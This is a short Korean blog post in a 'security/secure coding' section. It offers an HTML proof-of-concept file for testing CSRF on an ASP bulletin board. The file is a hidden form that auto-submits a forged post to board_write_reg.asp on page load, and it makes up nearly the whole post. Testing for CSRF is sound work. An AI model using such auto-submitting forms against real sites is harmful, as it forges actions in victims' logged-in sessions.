본문 바로가기

보안/시큐어코딩

ASP게시판에서 CSRF 취약점 테스트

ASP 게시판에서 CSRF 테스트시 공격스크립트로 사용하세요 ^^

csrf.txt

<body>

<form style="display:none" method="post" action="board_write_reg.asp" ENCTYPE="multipart/form-data">

<input type="hidden" name="title" value="임금님귀는 당나귀귀">

<input type="hidden" name="content" value="나만 알고 있으려니 입이 건질거려서.....">

<input type="submit" name="submit" id="send">

</form>

<script>document.forms[0].send.click();</script>

</body>